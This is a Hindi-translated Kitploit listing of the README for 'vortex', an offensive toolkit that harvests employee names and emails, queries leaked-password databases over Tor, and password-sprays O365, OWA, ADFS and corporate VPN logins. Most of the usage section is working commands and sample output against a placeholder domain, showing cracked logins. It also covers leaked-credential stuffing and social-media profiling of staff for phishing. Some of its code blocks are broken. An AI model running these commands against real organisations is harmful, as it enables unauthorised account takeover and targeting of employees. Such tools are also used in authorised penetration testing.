Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/klezvirus/vortex
OSINT (खुला स्रोत खुफिया)पासवर्ड क्रैकिंगफ़िशिंग उपकरणटोहीपासवर्ड हमलेभेद्यता विश्लेषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंगसामाजिक इंजीनियरिंगसबडोमेन एनुमरेशन
GitHubklezvirus/vortex

vortex

450514 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
vortex — VPN समग्र टोही, परीक्षण, गणना और शोषण टूलकिट | Kitploit

VPN समग्र टोही, परीक्षण, गणना और शोषण टूलकिट

रिपॉजिटरी देखें

🚩 यह vortex का सार्वजनिक रिपॉजिटरी है, नवीनतम संस्करण और अपडेट के लिए कृपया हमें https://porchetta.industries/ के माध्यम से समर्थन करने पर विचार करें

Vortex

VPN समग्री पुनर्ज्ञान, परीक्षण, गणना और शोषण टूलकिट

🚩 प्रायोजक

यदि आप इस प्रोजेक्ट को प्रायोजित करना चाहते हैं और vortex पर नवीनतम अपडेट, नवीनतम सुधार, नवीनतम सुविधाएँ प्राप्त करना चाहते हैं, तो कृपया हमें https://porchetta.industries/ पर समर्थन करें

आधिकारिक डिस्कॉर्ड चैनल

डिस्कॉर्ड पर आएं और बातचीत करें!

Porchetta Industries

अवलोकन

एक बहुत ही सरल Python फ्रेमवर्क, [SprayingToolkit][1] से प्रेरित, जो सामान्य O365 और VPN एंडपॉइंट (जैसे Cisco, Citrix, Fortinet, Pulse, आदि) का पता लगाने, गणना करने और हमला करने के लिए आवश्यक अधिकांश प्रक्रिया को स्वचालित करने का प्रयास करता है।

मैंने इसे क्यों विकसित किया

VPN स्प्रेइंग चरण को बहुत तेज और आसान बनाने के लिए। साथ ही, इसकी लचीलापन के कारण, इस टूल को आसानी से मौजूदा OSINT वर्कफ़्लो में जोड़ा जा सकता है।

यह टूल आपके लिए क्या कर सकता है

Vortex मुख्य रूप से निम्नलिखित कार्यों को करने में सहायता प्रदान करता है:

  • उपयोगकर्ता खोज और संग्रह
    • LinkedIn
    • Google
    • PwnDB
  • पासवर्ड लीक
    • PwnDB
  • मुख्य डोमेन पहचान
    • OWA
    • S4B/Lynk
    • ADFS
  • उपडोमेन खोज
    • गणना
    • ब्रूटफोर्स
  • VPN एंडपॉइंट का पता लगाना
  • पासवर्ड स्प्रेइंग/अनुमान लगाने के हमले
    • O365
    • Lynk/S4B
    • ADFS
    • IMAP
    • VPNs
      • Cisco
      • Citrix
      • FortiNet
      • Pulse Secure
      • SonicWall
  • सोशल नेटवर्क पर प्रोफ़ाइल खोजें
    • Instagram
    • Facebook
    • Twitter
    • TikTok
    • Onlyfans

स्थापना

pip3 के साथ पूर्वापेक्षाएँ इस प्रकार स्थापित करें:``` sudo -H pip3 install -r requirements.txt

root@kitploit:~
### Virtualenv के साथ इंस्टॉल करें

अन्यथा, आप वर्चुअल एनवायरनमेंट का उपयोग करके पूर्वापेक्षाएँ स्थापित कर सकते हैं:

###### विंडोज़ पर```
virtualenv venv
venv\Scripts\activate
pip install -r requirements.txt
लिनक्स पर```

python3 -m virtualenv venv source venv/bin/activate pip install -r requirements.txt

root@kitploit:~
## उपयोग

टूल का उपयोग करना काफी सीधा है, लेकिन एक कार्यप्रवाह का पालन करना होता है। टूल वर्तमान आक्रमण के बारे में जानकारी संग्रहीत करने के लिए SQLite डेटाबेस का उपयोग करता है।

### कार्यक्षेत्र

कार्यक्षेत्र टूल द्वारा उपयोग की जाने वाली डेटाबेस फ़ाइल का प्रतिनिधित्व करता है। नाम वर्तमान आक्रमण, प्रोजेक्ट या लक्ष्य को लेबल करने के लिए एक सरल नाम होना चाहिए।

प्रत्येक कार्यक्षेत्र को एक SQLite डेटाबेस निर्दिष्ट किया जाता है। जब आप एक कार्यक्षेत्र नाम निर्दिष्ट करते हैं, जैसे:

workspace_name

root@kitploit:~
python manage.py -w workspace1
```
आप वास्तव में कह रहे हैं "मैं `workspace1.db` फ़ाइल पर कार्य करना चाहता हूँ"।

#### कार्यक्षेत्र आरंभीकरण

ठीक से काम करने के लिए, Vortex को DB को सही स्कीमा के साथ आरंभीकृत करना होगा।
ऐसा करने के लिए, बस कमांड निष्पादित करना है:```
python manage.py -w workspace1 db -c init
```
यदि कोई उपयोगकर्ता इस चरण को छोड़ने का प्रयास करता है, तो Vortex पहले लॉन्च करने के लिए सही कमांड को स्क्रीन पर प्रिंट करेगा।```
[-] Workspace not initialized. Please initialise it using:
    python manage.py -w workspace1 db -c init
```
इसके बजाय, जब किसी मौजूदा, प्रारंभित DB के विरुद्ध वही कमांड चलाया जाता है, तो Vortex DB फ़ाइल को ओवरराइट करने से पहले पुष्टि मांगेगा:```
[-] The DB file exists and it was initialised, overwrite?
 [y|n] $> y
```
### क्रियाएँ और कमांड

Vortex एक positional argument, 'Action', और अन्य keyed values के साथ काम करता है।

इनमें से सबसे महत्वपूर्ण है command argument (`-c cmd`)। action value के साथ मिलकर,
command परिभाषित करता है कि Vortex को क्या करना चाहिए।

समर्थित actions की सूची Help से देखी जा सकती है:```
python manage.py -h

Vortex: VPN Overall Reconnaissance, Enumeration and eXploitation

positional arguments:
  {db,domain,import,office,profile,search,tor,validate,vpn}
                        Action to execute

optional arguments:
  -h, --help            show this help message and exit
  -w WORKSPACE, --workspace WORKSPACE
                        Workspace to use
  -c COMMAND, --command COMMAND
                        Command for the action
  -D DOMAIN, --domain DOMAIN
                        Domain under attack
  -C COMPANY, --company COMPANY
                        Company under attack
  -l LOCATION, --location LOCATION
                        Location of the company under attack (IE, UK, US, ...)
  -u URL, --url URL     VPN Endpoint Origin (schema://domain:port)
  -t ENDPOINT_TYPE, --endpoint-type ENDPOINT_TYPE
                        Target Endpoint Type
  -U USER, --user USER  User name
  -E EMAIL, --email EMAIL
                        User email
  -N NAME, --name NAME  User full name
  -R ROLE, --role ROLE  User job
  -s SQL, --sql SQL     SQL statement
  -O EXPORT_FILE, --export-file EXPORT_FILE
                        Export file
  -Q QUOTES, --quotes QUOTES
                        Produce an Excel safe CSV
  -nh, --no-headers     Remove CSV headers
  -k KEYWORDS, --keywords KEYWORDS
                        Search keywords
  -P PASSWORDS_FILE, --passwords-file PASSWORDS_FILE
                        Password file for spraying
  -L, --leaks           Use leaks for spraying
  -I IMPORT_FILE, --import-file IMPORT_FILE
                        Import file
```
#### गतिशील तर्क इनपुटिंग

जैसा कि सहायता से देखा जा सकता है, प्रति क्रिया समर्थित कमांड की सूची कहीं भी निर्दिष्ट नहीं है। ऐसा इसलिए है क्योंकि सीधे कमांड निर्दिष्ट करना आवश्यक नहीं है। वास्तव में, यदि कोई कमांड निर्दिष्ट नहीं है, तो Vortex उपयोगकर्ता से निर्दिष्ट क्रिया के लिए उपलब्ध कमांडों में से एक का चयन करने के लिए कहेगा।```
python manage.py -w workspace1 db

   ,d#####F^      ,yy############yy       ^9#######,
  ,######"      y###################by      ^9######,
  ######^     y#####F""       ^"9######y      "######]
 d#####^    ,#####" by klezVirus ^9#####,     ^######,
,#####]    ,####F    yy#######y,    ^9####b     ^######
[#####     ####F   ,###F""'"9####,    9####]     9#####
#####F    [####   ,##F^  yy   "###b    9####,    ^#####]
#####]    [###]   ###  dF""#b  ^###]   ^####]     #####]
9####b    [####   9##, 9bd [#]  [##b    #####     [#####
[#####     ####,   9##y, ,y##^  d##F    #####     [####]
 #####b    ^####y   ^"#####"   d###^   ,####]     d#####
 [#####,    ^####by          ,d###^    d####^     #####F
  9#####y     "#####byyyyyyd####F^    d####F     [#####9
   9#####b,     ""############"^    ,d####F     ,######
    ^######b,       ""'""'"^      ,d#####F      d#####F

[*] Select a command:
0 : init
1 : sql
2 : add-endpoint
3 : add-user
4 : drop-user
5 : truncate-table
6 : export
 $>
```
यही बात किसी विशेष रूटीन के लिए आवश्यक तर्क पर भी लागू होती है। यदि कोई तर्क रनटाइम पर इनपुट करना कठिन है, तो Vortex उपयोगकर्ता को दयालुतापूर्वक याद दिलाएगा कि पैरामीटर आवश्यक है। अन्यथा, Vortex उपयोगकर्ता को आवश्यक तर्कों का चयन या इनपुट करने में मार्गदर्शन करेगा।

उदाहरण के लिए, यदि कोई उपयोगकर्ता किसी विशिष्ट तालिका या यहां तक कि कॉलम को निर्यात करना चाहता है, तो केवल आवश्यक कार्य निर्यात कमांड लॉन्च करना होगा, जैसा कि नीचे दिए गए चित्र में देखा जा सकता है:

![Export Wizard](https://assets.kitploit.com/production/public/readmes/5129/d68f1299e07d162c61c0c98d33a490f36d51848799f72fe98eb5f2e565fdbf2a.gif)

इस प्रकार का व्यवहार Vortex को उपयोग करने में वास्तव में आसान बनाता है।

### सामान्य कार्यप्रवाह

Vortex को एक विशिष्ट संचालन कार्यप्रवाह का पालन करने के लिए डिज़ाइन किया गया है, जिसे नीचे दिए गए स्कीमा में संक्षेपित किया गया है:

![General Workflow](https://assets.kitploit.com/production/public/readmes/5129/bcde914863b2f917ef576c849a9374eabf3d10d26f3e271098ff8bc4a03f036b.png)

### संचालन

#### उपयोगकर्ता एकत्र करना

किसी विशिष्ट लक्ष्य के लिए मान्य उपयोगकर्ताओं को एकत्र करना तीन अलग-अलग स्रोतों का उपयोग करके किया जा सकता है:

* LinkedIn

यह स्रोत LinkedIn उपयोगकर्ता नीतियों के उल्लंघन के कारण हटा दिया गया है। 
आप अभी भी [GoMapEnum](https://github.com/nodauf/GoMapEnum) का उपयोग करके LinkedIn पर काम कर सकते हैं, 
और फिर `import` कमांड का उपयोग करके ईमेल पतों को आयात कर सकते हैं।

फिर से, कृपया ध्यान रखें कि इस कार्यक्षमता का उपयोग LinkedIn उपयोगकर्ता समझौते का उल्लंघन है, जैसा कि LinkedIn उपयोगकर्ता समझौते के बिंदु [8.2](https://www.linkedin.com/legal/user-agreement#dos) पर देखा जा सकता है:

> आप सहमत हैं कि आप नहीं करेंगे: [...]
> 2. सेवाओं से डेटा स्क्रैप करने या प्रोफाइल और अन्य डेटा कॉपी करने के लिए सॉफ्टवेयर, उपकरणों, स्क्रिप्ट्स, रोबोट या किसी अन्य माध्यम या प्रक्रिया (क्रॉलर, ब्राउज़र प्लगइन्स और ऐड-ऑन या किसी अन्य तकनीक सहित) का विकास, समर्थन या उपयोग करना;

* CrossLinked

उपरोक्त कार्यक्षमता को आंशिक रूप से बदलने के लिए, उपकरण [CrossLinked](https://github.com/m8r0wn/CrossLinked) का एक अनुकूलित संस्करण एम्बेड करता है। यह उपकरण Google और Bing का उपयोग करके किसी कंपनी के कर्मचारियों का पता लगाने का प्रयास करेगा। यह निश्चित रूप से LinkedIn पर सीधे खोज करने जैसा नहीं है, लेकिन यह काफी उपयोगी है।

सही ढंग से संचालित करने के लिए, उपकरण उपयोगकर्ता से पूछेगा कि उपयोगकर्ता नामों के लिए किस प्रारूप का उपयोग किया जाना चाहिए (जैसे john.doe, j.doe या d.john) और लक्ष्य डोमेन द्वारा उपयोग किया जाने वाला मानक डोमेन कौन सा है।```
python manage.py -w workspace1 search -c crosslinked -D evilcorp.com -C "Evil Corporation"

   ,d#####F^      ,yy############yy       ^9#######,
  ,######"      y###################by      ^9######,
  ######^     y#####F""       ^"9######y      "######]
 d#####^    ,#####" by klezVirus ^9#####,     ^######,
,#####]    ,####F    yy#######y,    ^9####b     ^######
[#####     ####F   ,###F""'"9####,    9####]     9#####
#####F    [####   ,##F^  yy   "###b    9####,    ^#####]
#####]    [###]   ###  dF""#b  ^###]   ^####]     #####]
9####b    [####   9##, 9bd [#]  [##b    #####     [#####
[#####     ####,   9##y, ,y##^  d##F    #####     [####]
 #####b    ^####y   ^"#####"   d###^   ,####]     d#####
 [#####,    ^####by          ,d###^    d####^     #####F
  9#####y     "#####byyyyyyd####F^    d####F     [#####9
   9#####b,     ""############"^    ,d####F     ,######
    ^######b,       ""'""'"^      ,d#####F      d#####F

[+] Select a format for usernames
  0: firstlast
  1: lastfirst
  2: first.last
  3: last.first
  4: last.f
  5: flast
  6: lfirst
  7: f.last
  8: l.first
  9: first
  10: last
  $> 2
[*] Starting search on Google and Bing with CrossLinked
  [>] Searching google for valid employee names at "Evil Corporation"
  [>] Searching bing for valid employee names at "Evil Corporation"
  [>] Found 133 LinkedIn accounts!
[*] Updating DB ...
[+] Done!
```
* Google

यह स्रोत [theHarvester]() के एक छीने गए, संशोधित संस्करण का उपयोग करके संचालित होता है।
यह उपकरण Google Dorks का उपयोग करके Google से नाम/ईमेल निकालने का प्रयास करेगा (Passive Gathering), और कंपनी की वेबसाइट से (Active Gathering)।```
python manage.py -w workspace1 search -c google -D evilcorp.com

[*] Starting passive/active search on Google
[*] (PASSIVE) Searching for emails NOT within the domain's site: evilcorp.com -site:evilcorp.com
[*] (ACTIVE) Searching for emails within the domain's sites: evilcorp.com
[+] Scraping any emails from: https://evilcorp.com
[+] Scraping any emails from: https://www.facebook.com/EvilCorp/
...

[+] 2 unique emails found:
---------------------------
[email protected]
[email protected]
  [>] Found 2 mail 
[*] Updating DB ...
[+] Done!
```
* PwnDB

यह स्रोत [sn0int](https://github.com/kpcyrd/sn0int) में कार्यान्वित एक के पोर्टेड संस्करण का उपयोग करके संचालित होता है।

**नोट**: इस कार्यक्षमता के लिए TOR नेटवर्क से जुड़े होना आवश्यक है। Windows पर, Vortex के साथ प्रदान किए गए एम्बेडेड संस्करण का उपयोग करना संभव है। Linux पर, इसके बजाय, tor पैकेज (जैसे Kali पर `sudo apt-get install tor`) स्थापित करना आवश्यक है।

##### TOR प्रारंभ करें```
python manage.py -w workspace1 tor -c start

[*] Starting TOR Browser, click on connect
```
##### PwnDB पर पर गणना करें```
python manage.py -w workspace1 search -c pwndb -D evilcorp.com

[*] Starting search on PwnDB
  [>] Found 493 leaked accounts!
[*] Updating DB ...
[+] Done!
```
##### रोकें TOR```
python manage.py -w workspace1 tor -c stop

[*] Stopping TOR browser
```
#### एंडपॉइंट एकत्रित करें

Vortex मुख्य रूप से एंडपॉइंट के लिए दो मैक्रो-श्रेणियों का उपयोग करता है: VPN और Microsoft (Office) एंडपॉइंट।
किसी लक्ष्य को Office या VPN एंडपॉइंट के रूप में जोड़ा जा सकता है, और Vortex विभिन्न वैलिडेटर्स का उपयोग करके एंडपॉइंट को क्रमशः Office या VPN एंडपॉइंट के रूप में मान्य करने का प्रयास करेगा।

##### एक office एंडपॉइंट जोड़ें

आइए इसे एक उदाहरण से स्पष्ट करते हैं। उपयोगकर्ता को लक्ष्य `evilcorp.com` पर हमला करने की आवश्यकता है, और यह जांचना चाहता है कि डोमेन OWA, Lync, ADFS, या O365 लक्ष्य है या नहीं।```
python manage.py -w workspace1 office -c add -D evilcorp.com

[#] OWA domain appears to be hosted internally
[+] evilcorp.com is a valid OWA target!
[-] evilcorp.com does not seem a valid LYNK target
[-] evilcorp.com does not seem a valid ADFS target
[-] evilcorp.com does not seem a valid IMAP target
[+] evilcorp.com is a valid O365 target!
```
##### VPN एंडपॉइंट्स के लिए सबडोमेन खोजें

VPN एंडपॉइंट्स के लिए, उपयोगकर्ता VPN वेब लॉगिन चलाने वाले होस्ट ढूंढने के लिए सबडोमेन खोज कर सकता है,
जैसे:```
python manage.py -w workspace1 domain -c enum -D evilcorp.com

   ,d#####F^      ,yy############yy       ^9#######,
  ,######"      y###################by      ^9######,
  ######^     y#####F""       ^"9######y      "######]
 d#####^    ,#####" by klezVirus ^9#####,     ^######,
,#####]    ,####F    yy#######y,    ^9####b     ^######
[#####     ####F   ,###F""'"9####,    9####]     9#####
#####F    [####   ,##F^  yy   "###b    9####,    ^#####]
#####]    [###]   ###  dF""#b  ^###]   ^####]     #####]
9####b    [####   9##, 9bd [#]  [##b    #####     [#####
[#####     ####,   9##y, ,y##^  d##F    #####     [####]
 #####b    ^####y   ^"#####"   d###^   ,####]     d#####
 [#####,    ^####by          ,d###^    d####^     #####F
  9#####y     "#####byyyyyyd####F^    d####F     [#####9
   9#####b,     ""############"^    ,d####F     ,######
    ^######b,       ""'""'"^      ,d#####F      d#####F

[*] Starting subdomain passive enumeration
  [>] Found 10 subdomains
  [$] Elapsed time: 18.360117197036743
[*] Enumerating potential VPN endpoints (HTTPS on 443, 10443)
  [>] Found 1 hosts running an SSL webserver
  [$] Elapsed time: 18.916626691818237
[*] Trying to detect hosts with VPN web-login
  [>] Found 1 hosts with a VPN web login
  [$] Elapsed time: 32.919618368148804
[*] Updating DB...
  [+] Adding vpn.evilcorp.com:443 as a pulse target
  [>] Elapsed time: 18.920615434646606
[+] Done
```
##### VPN एंडपॉइंट मैन्युअल रूप से जोड़ें

VPN एंडपॉइंट को मैन्युअल रूप से जोड़ने के लिए, निश्चित रूप से, शीर्ष स्तरीय डोमेन निर्दिष्ट करना शायद पर्याप्त नहीं होगा।
सही तरीका यह होगा कि एक विशिष्ट उपडोमेन के साथ-साथ वह विशिष्ट पोर्ट भी निर्दिष्ट किया जाए जिस पर VPN वेब सर्वर है 
चल रहा है।```
python manage.py -w workspace1 vpn -c add -D vpn.evilcorp.com:443

[+] vpn.evilcorp.com:443 is a pulse target!
```
#### OWA, ADFS, LYNC, या O365 के विरुद्ध पासवर्ड स्प्रे या ब्रूटफोर्स हमला करें

पासवर्ड स्प्रे या ब्रूटफोर्स हमला करने के लिए, एकमात्र आवश्यक 
संसाधन एक पासवर्ड सूची है जो एक टेक्स्ट फ़ाइल के रूप में होती है, जिसमें प्रति पंक्ति एक पासवर्ड 
होता है।```
python manage.py -w workspace1 office -c attack -P passwords.txt

   ,d#####F^      ,yy############yy       ^9#######,
  ,######"      y###################by      ^9######,
  ######^     y#####F""       ^"9######y      "######]
 d#####^    ,#####" by klezVirus ^9#####,     ^######,
,#####]    ,####F    yy#######y,    ^9####b     ^######
[#####     ####F   ,###F""'"9####,    9####]     9#####
#####F    [####   ,##F^  yy   "###b    9####,    ^#####]
#####]    [###]   ###  dF""#b  ^###]   ^####]     #####]
9####b    [####   9##, 9bd [#]  [##b    #####     [#####
[#####     ####,   9##y, ,y##^  d##F    #####     [####]
 #####b    ^####y   ^"#####"   d###^   ,####]     d#####
 [#####,    ^####by          ,d###^    d####^     #####F
  9#####y     "#####byyyyyyd####F^    d####F     [#####9
   9#####b,     ""############"^    ,d####F     ,######
    ^######b,       ""'""'"^      ,d#####F      d#####F

[*] Choose an endpoint type to attack, or all to attack any supported endpoint
0 : owa
1 : lync
2 : imap
3 : adfs
4 : o365
5 : all
 $> 4
[*] Running O365Enumerator
  [-] [email protected]:MrRobot2021! is not valid.
  [+] [email protected]:Joanna2021! is valid!
  [>] Found 1 valid logins
[*] Updating Db...
[+] Done
```
#### VPN एंडपॉइंट के विरुद्ध पासवर्ड स्प्रे या ब्रूटफोर्स हमला करें

पासवर्ड स्प्रे या ब्रूटफोर्स हमला करने के लिए, एकमात्र आवश्यक संसाधन एक पासवर्ड सूची है जो टेक्स्ट फ़ाइल के रूप में हो, जिसमें प्रति पंक्ति एक पासवर्ड हो।```
python manage.py -w workspace1 vpn -c attack -P passwords.txt

   ,d#####F^      ,yy############yy       ^9#######,
  ,######"      y###################by      ^9######,
  ######^     y#####F""       ^"9######y      "######]
 d#####^    ,#####" by klezVirus ^9#####,     ^######,
,#####]    ,####F    yy#######y,    ^9####b     ^######
[#####     ####F   ,###F""'"9####,    9####]     9#####
#####F    [####   ,##F^  yy   "###b    9####,    ^#####]
#####]    [###]   ###  dF""#b  ^###]   ^####]     #####]
9####b    [####   9##, 9bd [#]  [##b    #####     [#####
[#####     ####,   9##y, ,y##^  d##F    #####     [####]
 #####b    ^####y   ^"#####"   d###^   ,####]     d#####
 [#####,    ^####by          ,d###^    d####^     #####F
  9#####y     "#####byyyyyyd####F^    d####F     [#####9
   9#####b,     ""############"^    ,d####F     ,######
    ^######b,       ""'""'"^      ,d#####F      d#####F

[*] Choose an endpoint type to attack, or all to attack any supported endpoint
0 : cisco
1 : citrix
2 : citrixlegacy
3 : fortinet
4 : pulse
5 : sonicwall
6 : all
 $> 6
[*] Attacking vpn.evilcorp.com:443
  [-] [email protected]:MrRobot2021! is not valid.
  [+] [email protected]:Joanna2021! is valid!
  [>] Found 1 valid logins
[*] Updating Db...
[+] Done
```
#### लीक हुए क्रेडेंशियल्स का उपयोग करके पासवर्ड स्प्रे या ब्रूटफ़ोर्स करें

चूंकि Vortex PwnDB पर लीक हुए क्रेडेंशियल्स पर नज़र रखता है, उपयोगकर्ता पासवर्ड फ़ाइल प्रदान करने के बजाय सभी लीक हुए क्रेडेंशियल्स का परीक्षण करने का चयन कर सकता है।

हालाँकि, यह व्यवहार सामान्य पासवर्ड स्प्रे से काफी अलग है। सामान्य पासवर्ड स्प्रे हमले में, वास्तव में, एक ही पासवर्ड सभी उपयोगकर्ताओं के विरुद्ध आज़माया जाता है। लीक हुए क्रेडेंशियल्स के हमले में, लीक हुए क्रेडेंशियल्स का परीक्षण उस विशिष्ट उपयोगकर्ता के विरुद्ध किया जाता है जिसके साथ वे लीक हुए थे। इसलिए, उदाहरण के लिए, यदि Vortex को ये लीक मिले:```
User                            Leaks
----------------------------    ----------------------------
[email protected]    ["ISecretlyLoveAngela2020!"]
[email protected]        ["Puppy19!", "MySweetJ111!"]
```
Vortex निम्नलिखित प्रयासों को संचालित करेगा, और केवल निम्नलिखित:```
[email protected]:ISecretlyLoveAngela2020!
[email protected]:Puppy19!
[email protected]:MySweetJ111!
```
इस हमले को करने के लिए, किसी पासवर्ड फ़ाइल की आवश्यकता नहीं है, लेकिन
(-L, या --leaks) पैरामीटर सेट करना आवश्यक है।```
python manage.py -w workspace1 vpn -c attack -L

   ,d#####F^      ,yy############yy       ^9#######,
  ,######"      y###################by      ^9######,
  ######^     y#####F""       ^"9######y      "######]
 d#####^    ,#####" by klezVirus ^9#####,     ^######,
,#####]    ,####F    yy#######y,    ^9####b     ^######
[#####     ####F   ,###F""'"9####,    9####]     9#####
#####F    [####   ,##F^  yy   "###b    9####,    ^#####]
#####]    [###]   ###  dF""#b  ^###]   ^####]     #####]
9####b    [####   9##, 9bd [#]  [##b    #####     [#####
[#####     ####,   9##y, ,y##^  d##F    #####     [####]
 #####b    ^####y   ^"#####"   d###^   ,####]     d#####
 [#####,    ^####by          ,d###^    d####^     #####F
  9#####y     "#####byyyyyyd####F^    d####F     [#####9
   9#####b,     ""############"^    ,d####F     ,######
    ^######b,       ""'""'"^      ,d#####F      d#####F

[*] Choose an endpoint type to attack, or all to attack any supported endpoint
0 : cisco
1 : citrix
2 : citrixlegacy
3 : fortinet
4 : pulse
5 : sonicwall
6 : all
 $> 6
[*] Attacking vpn.evilcorp.com:443
  [+] [email protected]:ISecretlyLoveAngela2020! is valid!
  [-] [email protected]:Puppy19! is not valid.
  [-] [email protected]:MySweetJ111! is not valid.
  [>] Found 1 valid logins
[*] Updating Db...
[+] Done
```
यह काफी हद तक सब कुछ है। कभी-कभी उपकरण किसी हमले को करने से पहले अधिक जानकारी मांग सकता है, जैसे कि VPN realm/group का चयन करना।

##### परिणाम दिखाना

किसी भी समय, आप निम्नलिखित कमांड का उपयोग करके पाए गए वैध लॉगिन देख सकते हैं:

```
crackmapexec -u users.txt -p passwords.txt --continue-on-success

python manage.py db -w workspace1 -c found-logins [+] Valid Logins Collected: ID Target E-Mail Password


1 vpn.evilcorp.com:443 [email protected] Joanna2021! 2 vpn.evilcorp.com:443 [email protected] ISecretlyLoveAngela2020! [+] Done

root@kitploit:~
#### सोशल नेटवर्क प्रोफाइल खोजना

कभी-कभी, बड़े अभियानों में, अपने लक्ष्यों के बारे में थोड़ा और जानने से हमें उनकी सुरक्षा में सेंध लगाने में मदद मिलती है, जैसे कि फ़िशिंग के लिए व्यक्तिगत ईमेल या सोशल अकाउंट का उपयोग करना, या पासवर्ड रीसेट सुरक्षा प्रश्नों के उत्तर खोजना)।

इस कारण से, मैंने [Profil3r](https://github.com/Greyjedix/Profil3r) को एकीकृत किया है। यह उपकरण किसी व्यक्ति से संभावित रूप से संबंधित सोशल नेटवर्क अकाउंट की पहचान करने का प्रयास करता है।

**महत्वपूर्ण नोट**: Profil3r नाम मैशिंग का उपयोग करके वैध प्रोफाइल का पता लगाने का प्रयास करता है। यह गारंटी नहीं दे सकता कि मिली प्रोफाइल वास्तव में लक्ष्य व्यक्ति से संबंधित हैं। इस कारण से, प्रोफाइल स्वचालित रूप से Vortex DB में नहीं जोड़ी जाती हैं।

वर्तमान में, Profil3r के साथ दो मोड में काम करना संभव है:

* सिंगल-मोड
* मल्टी-मोड

सिंगल-मोड उपयोगकर्ता द्वारा प्रदान किए गए कीवर्ड के सेट पर काम करता है:```
python manage.py -w workspace1 profile -c single -k elliot -k alderson

   ,d#####F^      ,yy############yy       ^9#######,
  ,######"      y###################by      ^9######,
  ######^     y#####F""       ^"9######y      "######]
 d#####^    ,#####" by klezVirus ^9#####,     ^######,
,#####]    ,####F    yy#######y,    ^9####b     ^######
[#####     ####F   ,###F""'"9####,    9####]     9#####
#####F    [####   ,##F^  yy   "###b    9####,    ^#####]
#####]    [###]   ###  dF""#b  ^###]   ^####]     #####]
9####b    [####   9##, 9bd [#]  [##b    #####     [#####
[#####     ####,   9##y, ,y##^  d##F    #####     [####]
 #####b    ^####y   ^"#####"   d###^   ,####]     d#####
 [#####,    ^####by          ,d###^    d####^     #####F
  9#####y     "#####byyyyyyd####F^    d####F     [#####9
   9#####b,     ""############"^    ,d####F     ,######
    ^######b,       ""'""'"^      ,d#####F      d#####F

[*] Starting single profile search
...
└── FACEBOOK ✔️
   ├──https://facebook.com/elliot
   ├──https://facebook.com/alderson
   ├──https://facebook.com/elliotalderson
   ├──https://facebook.com/aldersonelliot
   ├──https://facebook.com/elliot.alderson
   ├──https://facebook.com/alderson.elliot
...
[+] Done!

The multi-mode operates on first and last name of each user in the DB. Any additional keyword passed in multi-mode is used in combination with users' first and last name. So, as example, you can use additional names or numbers to customise the profile search.``` python manage.py -w workspace1 profile -c multi -k 90

,d#####F^ ,yy############yy ^9#######, ,######" y###################by ^9######, ######^ y#####F"" ^"9######y "######] d#####^ ,#####" by klezVirus ^9#####, ^######, ,#####] ,####F yy#######y, ^9####b ^###### [##### ####F ,###F""'"9####, 9####] 9##### #####F [#### ,##F^ yy "###b 9####, ^#####] #####] [###] ### dF""#b ^###] ^####] #####] 9####b [#### 9##, 9bd [#] [##b ##### [##### [##### ####, 9##y, ,y##^ d##F ##### [####] #####b ^####y ^"#####" d###^ ,####] d##### [#####, ^####by ,d###^ d####^ #####F 9#####y "#####byyyyyyd####F^ d####F [#####9 9#####b, ""############"^ ,d####F ,###### ^######b, ""'""'"^ ,d#####F d#####F

[*] Starting per-user profile search [>] Searching profiles for Elliot Alderson. Additional keywords: 90 ... └── TWITTER ✔️ ├──https://twitter.com/ElliotAlderson ├──https://twitter.com/AldersonElliot ├──https://twitter.com/Elliot90 ├──https://twitter.com/90Elliot ├──https://twitter.com/Alderson90 ... [>] Searching profiles for Tom Wellick. Additional keywords: 90 ... └── TWITTER ✔️ ├──https://twitter.com/Tom ├──https://twitter.com/Wellick ├──https://twitter.com/90 ├──https://twitter.com/Tom90 ├──https://twitter.com/90Tom ... [+] Done!

root@kitploit:~
#### बाहरी डेटा आयात करना

वोर्टेक्स उपयोगकर्ताओं या एंडपॉइंट्स से संबंधित बाहरी डेटा आयात करने का समर्थन भी प्रदान करता है।
वर्तमान में, केवल सादे पाठ फ़ाइलें समर्थित हैं और CSV के लिए सीमित समर्थन भी है।

अब तक आयात किए जा सकने वाले डेटा प्रकार हैं:

* ई-मेल पते
* उपयोगकर्ता नाम
* वीपीएन एंडपॉइंट (लक्ष्य:पोर्ट)
* डोमेन
* ~~PwnDB से लीक~~ अब अप्रचलित: बस सर्च कमांड का उपयोग करें
* ~~Blues~~ के साथ निकाला गया LinkedIn डेटा

प्रत्येक डेटा-प्रकार सामान्य पाठ-फ़ाइल प्रारूप में समर्थित है, प्रति पंक्ति एक तत्व।

## रोडमैप

नई कार्यक्षमताएं जल्द ही आ रही हैं (2022):

* स्मार्ट पासवर्ड सूची निर्माण
* डेटा निष्कर्षण और सहसंबंध

कृपया बग, सुझाव या फीचर अनुरोध सबमिट करें।

## श्रेय

* [byt3bl33d3r](https://twitter.com/byt3bl33d3r): [SprayingToolkit][1] पर उनके अद्भुत कार्य के लिए, जिसने परियोजना को प्रेरित किया
* [nodauf](https://twitter.com/nodauf): [GoMapEnum](https://github.com/nodauf/GoMapEnum) पर उनके कार्य के लिए, जिसने मुझे अन्य विचार दिए
* [quasart](https://github.com/quasart): लोगो [spiral](https://github.com/quasart/spiral) के साथ उत्पन्न किया गया था
* [m8r0wn](https://twitter.com/m8r0wn): [CrossLinked](https://github.com/m8r0wn/CrossLinked) पर उनके कार्य के लिए, जो वास्तव में एक शानदार उपकरण है
* [Greyjedix](https://github.com/Greyjedix/): [Profil3r](https://github.com/Greyjedix/Profil3r) पर उनके कार्य के लिए, जो कुछ परिस्थितियों में बहुत उपयोगी उपकरण है

